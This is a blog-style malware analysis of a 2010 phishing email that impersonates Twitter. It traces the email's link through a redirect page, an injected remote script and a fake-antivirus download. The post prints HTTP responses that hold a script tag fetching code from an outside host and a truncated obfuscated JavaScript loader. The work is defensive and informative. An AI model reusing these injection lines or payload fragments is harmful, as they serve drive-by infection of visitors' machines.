I’ve had several fake emails that initially look like they come from Twitter in my email recently. I didn’t think anything of it until several of my friends forwarded me the same type of emails. This suggests two things. One, that these emails are starting to hit a larger audience. Or two, they are targeting just my friends and I which is totally possible. Anyway, here is a quick bit of analysis of one of these emails. I found some interesting things when I investigated the website linked in the fake email. The link in this particular could have done more damage if it wasn’t for some crappy attacker code. Read on!
The Email
The following screen shot shows you what the email looks like. It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real. First, the Twitter account mentioned is just the first part of the email address this was sent to. This may or may not be your Twitter ID. Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body. Yep. All the signs that this isn’t from Twitter. Ok, nothing to see here right?
The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:
An HTML page is loaded which redirects you to a shady Russian software site. This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010. The HTML file also loads a script which runs a PHP file on another server. Let’s take a look at the response:
HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>
<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>
<title></title><html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>
The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file. Here is the response:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/[‘ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>
All of the stuff following the script tag is obfuscated JavaScript. I cut most of it out as it is quite lengthy. Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins. You can check out the script and the unpacked version over at the jsunpack site.
Now this is where it gets interesting. In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404′s. You can also see this in the Wireshark capture below:
In Firefox it’s a different story. The Russian software site still loads and something else attempts to get requested:
hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4
This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.
You probably don’t want to run that file. The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there. One problem I see is that if you are running an older version of Firefox you might not get this notification. I haven’t tested this with other browsers but your results may vary.
What does this all mean? Well of course don’t click on shady emails like this. You know better right? Also, don’t think that because you use Firefox you are safe from attacks like these! Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE. Wait, too late isn’t it? Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.
Share and Enjoy
• Facebook • Twitter • Delicious • Digg • StumbleUpon • Add to favorites • Email • RSS